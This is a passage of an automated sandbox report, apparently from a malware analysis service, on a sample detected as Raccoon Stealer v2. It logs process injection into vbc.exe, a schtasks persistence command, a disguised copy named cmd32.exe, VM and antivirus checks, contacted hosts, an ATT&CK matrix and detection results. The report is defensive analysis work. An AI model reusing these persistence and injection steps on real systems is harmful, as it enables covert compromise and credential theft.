          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exe TID: 5060Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exe TID: 5656Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmp TID: 3868Thread sleep count: 70 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 4640Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAPI coverage: 7.5 %
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\setuphelper.dllJump to dropped file
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAPI call chain: ExitProcess graph end nodegraph_18-20442
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpAPI call chain: ExitProcess graph end nodegraph_20-3635
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: z5i6tLOUD0.exe, 00000000.00000002.315355541.0000000003E5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: svchost.exe, 0000000C.00000002.562547678.00000208D1DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: z5i6tLOUD0.exeBinary or memory string: jdfffgdkdfkshgfs
          Source: z5i6tLOUD0.exeBinary or memory string: .cctorobjectmethodInvokenhffddfsfkdkdhkcsdffdfhkfsfdfhdddhshcfckffhdfddkdfhghfBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresulthfshdkfhfffddfkchhfgfsdkddfhfdckhdfhffcfdsffdddhhkkffghhjfsdfdfcdfhkffkhjfffffdsfhddkkhjfjcffsddkfkddhfghjsddkddffdshdjfffffgjhkdksgcafpsfhjfkfdhffjffhfdhdkhsscsfgdbfjdfddfshfkcffkfhgjffscdghkddhfkdffjjhfsfcdgdfdgkkffjjkgdfdcdfgksfhffjsfhgdffdkgfgjjfsgdhfkffdgjhdssdgfdfkhffdjgdffgkhdjsdfdffhdfhsfjfghsdkdffhfjfdfdghffdkgdsfhjdfffgdkdfkshgfsgssddhjkffdfkgdssdfgfkhjfdfjhsdgghdffsfjfsgdddhffkadhdsfdkffhfdddhskhdhdgffdsdshfdhkdfhfsdfdsfhddkffsjkkfdhdhfsdffgkdhffssdgdfjdsdhsdfkgfdhhjhgfhdkshddffgjfsdhdhfdfkgjddfsddhfhkfjjdfhfdddffsdkfjhdfffdfhdkfshhdffhsdhdfdkdfaffdsdfhhfhhsdffdshffdhfhffdsfdhsdhshhhgdffdsfhsfdsfdhffdhsfhddfhsssfdhdffhhfdhddfsfjhffsddfdhstartupInfoagnFASniCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType
          Source: node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.544706692.0000015A138E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.544158809.0000015A13869000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.544562891.0000015A138C9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.542247785.0000015A13868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000000C.00000002.562547678.00000208D1DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1alized
          Source: node.exe, 00000022.00000002.619013307.0000000012400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
          Source: svchost.exe, 00000008.00000002.549194656.000001AB4D829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AAD434 FindFirstFileW,FindClose,18_2_03AAD434
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AACE68 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,18_2_03AACE68
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00402868 FindFirstFileW,20_2_00402868
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC4598 DoUpdateSvcDacl,OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,QueryServiceObjectSecurity,GetSecurityDescriptorDacl,BuildExplicitAccessWithNameW,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetServiceObjectSecurity,CloseServiceHandle,CloseServiceHandle,LocalFree,GetProcessHeap,HeapFree,18_2_03BC4598
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43A0000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43A0000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43A0000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43A1000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43AC000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43AF000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 43B0000Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4411008Jump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /fJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\z5i6tLOUD0.exe" "C:\Users\user\AppData\Roaming\cmd32.exeJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeProcess created: C:\Users\user\AppData\Local\Temp\WingFtpServer.exe "C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /fJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\net.exe "net" stop windowsnetservicehelper.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "taskkill" /IM windowsnetservicehelper.exe /T /FJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\sc.exe "sc" delete windowsnetservicehelper.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" installJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe "windowsnetservicehelper.exe" startJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop windowsnetservicehelper.exeJump to behavior
          Source: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exeProcess created: C:\Program Files (x86)\WindowsNetService\node.exe C:\Program Files (x86)\WindowsNetService\node.exe" "C:\Program Files (x86)\WindowsNetService\service.js
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
          Source: C:\Program Files (x86)\WindowsNetService\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpProcess created: C:\Windows\SysWOW64\taskkill.exe "taskkill" /IM windowsnetservicehelper.exe /T /FJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC4598 DoUpdateSvcDacl,OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,QueryServiceObjectSecurity,GetSecurityDescriptorDacl,BuildExplicitAccessWithNameW,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetServiceObjectSecurity,CloseServiceHandle,CloseServiceHandle,LocalFree,GetProcessHeap,HeapFree,18_2_03BC4598
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,18_2_03AAD584
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: GetLocaleInfoW,18_2_03AC57BC
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: GetLocaleInfoW,18_2_03AC5770
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_03AACA0C
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: EnumSystemLocalesW,18_2_03AC9A54
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: GetLocaleInfoW,18_2_03AC9848
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeQueries volume information: C:\Users\user\Desktop\z5i6tLOUD0.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86)\WindowsNetService\service.js VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86) VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86)\WindowsNetService VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86)\WindowsNetService\service.js VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86)\WindowsNetService\service.js VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Program Files (x86)\WindowsNetService\status.dat VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Program Files (x86)\WindowsNetService\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
          Source: C:\Users\user\Desktop\z5i6tLOUD0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC3AA0 GetLocalTime,18_2_03AC3AA0
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AC7C84 GetVersionExW,18_2_03AC7C84

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
          Source: svchost.exe, 0000000C.00000002.561562870.00000208D1D6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
          Source: svchost.exe, 0000000F.00000002.554301649.000001C295502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: svchost.exe, 0000000F.00000002.550801029.000001C295440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Raccoon Stealer v2
          Source: Yara matchFile source: 0.2.z5i6tLOUD0.exe.3e45fd0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.vbc.exe.43a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.z5i6tLOUD0.exe.3e45fd0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.315220700.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Raccoon Stealer v2
          Source: Yara matchFile source: 0.2.z5i6tLOUD0.exe.3e45fd0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.vbc.exe.43a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.z5i6tLOUD0.exe.3e45fd0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.315220700.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03BC5078 CheckPort,WSAStartup,WSACleanup,socket,WSACleanup,htons,inet_addr,bind,closesocket,WSACleanup,18_2_03BC5078

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Valid Accounts          		121
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		111
          Disable or Modify Tools          		1
          Input Capture          		1
          System Time Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Command and Scripting Interpreter          		1
          Valid Accounts          		1
          Valid Accounts          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory3
          File and Directory Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth12
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Scheduled Task/Job          		23
          Windows Service          		11
          Access Token Manipulation          		11
          Obfuscated Files or Information          		Security Account Manager56
          System Information Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration11
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts23
          Service Execution          		1
          Scheduled Task/Job          		23
          Windows Service          		11
          Software Packing          		NTDS351
          Security Software Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon Script311
          Process Injection          		1
          DLL Side-Loading          		LSA Secrets241
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size Limits13
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common1
          Scheduled Task/Job          		2
          Masquerading          		Cached Domain Credentials2
          System Owner/User Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Valid Accounts          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job241
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Access Token Manipulation          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)311
          Process Injection          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 701216 Sample: z5i6tLOUD0.exe Startdate: 12/09/2022 Architecture: WINDOWS Score: 60 124 Multi AV Scanner detection for dropped file 2->124 126 Multi AV Scanner detection for submitted file 2->126 128 Yara detected Raccoon Stealer v2 2->128 130 4 other signatures 2->130 10 z5i6tLOUD0.exe 3 2->10         started        14 windowsnetservicehelper.exe 2->14         started        16 svchost.exe 2->16         started        18 8 other processes 2->18 process3 file4 114 C:\Users\user\AppData\...\WingFtpServer.exe, PE32 10->114 dropped 116 C:\Users\user\AppData\...\z5i6tLOUD0.exe.log, ASCII 10->116 dropped 148 Writes to foreign memory regions 10->148 150 Allocates memory in foreign processes 10->150 152 Injects a PE file into a foreign processes 10->152 20 WingFtpServer.exe 2 10->20         started        24 cmd.exe 3 10->24         started        26 cmd.exe 1 10->26         started        33 2 other processes 10->33 28 node.exe 14->28         started        154 Changes security center settings (notifications, updates, antivirus, firewall) 16->154 31 MpCmdRun.exe 16->31         started        156 Query firmware table information (likely to detect VMs) 18->156 signatures5 process6 dnsIp7 102 C:\Users\user\AppData\...\WingFtpServer.tmp, PE32 20->102 dropped 138 Multi AV Scanner detection for dropped file 20->138 140 Obfuscated command line found 20->140 35 WingFtpServer.tmp 7 20->35         started        104 C:\Users\user\AppData\Roaming\cmd32.exe, PE32 24->104 dropped 106 C:\Users\user\...\cmd32.exe:Zone.Identifier, ASCII 24->106 dropped 39 conhost.exe 24->39         started        142 Uses schtasks.exe or at.exe to add and modify task schedules 26->142 52 2 other processes 26->52 120 register.starhome.io 142.93.96.73, 49753, 6101 DIGITALOCEAN-ASNUS United States 28->120 122 files.starhome.io 188.114.96.3, 443, 49755 CLOUDFLARENETUS European Union 28->122 41 WMIC.exe 28->41         started        43 WMIC.exe 28->43         started        45 WMIC.exe 28->45         started        54 6 other processes 28->54 47 conhost.exe 31->47         started        49 WerFault.exe 23 9 33->49         started        file8 signatures9 process10 dnsIp11 94 C:\Users\user\AppData\Local\...\wns22DB.tmp, PE32 35->94 dropped 96 C:\Users\user\AppData\...\setuphelper.dll, PE32 35->96 dropped 98 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 35->98 dropped 100 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 35->100 dropped 132 Antivirus detection for dropped file 35->132 134 Multi AV Scanner detection for dropped file 35->134 56 wns22DB.tmp 20 35->56         started        136 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 41->136 60 conhost.exe 41->60         started        62 conhost.exe 43->62         started        64 conhost.exe 45->64         started        118 192.168.2.1 unknown unknown 49->118 66 conhost.exe 54->66         started        68 conhost.exe 54->68         started        70 conhost.exe 54->70         started        72 2 other processes 54->72 file12 signatures13 process14 file15 108 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 56->108 dropped 110 C:\...\windowsnetservicehelper.exe, PE32 56->110 dropped 112 C:\Program Files (x86)\...\node.exe, PE32 56->112 dropped 144 Multi AV Scanner detection for dropped file 56->144 146 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 56->146 74 net.exe 1 56->74         started        76 taskkill.exe 1 56->76         started        78 sc.exe 56->78         started        80 2 other processes 56->80 signatures16 process17 process18 82 conhost.exe 74->82         started        84 net1.exe 1 74->84         started        86 conhost.exe 76->86         started        88 conhost.exe 78->88         started        90 conhost.exe 80->90         started        92 conhost.exe 80->92         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          z5i6tLOUD0.exe60%ReversingLabsByteCode-MSIL.Trojan.RaccoonSteal
          z5i6tLOUD0.exe28%VirustotalBrowse
          z5i6tLOUD0.exe0%MetadefenderBrowse
          z5i6tLOUD0.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp100%AviraTR/Dropper.Gen
          C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\cmd32.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
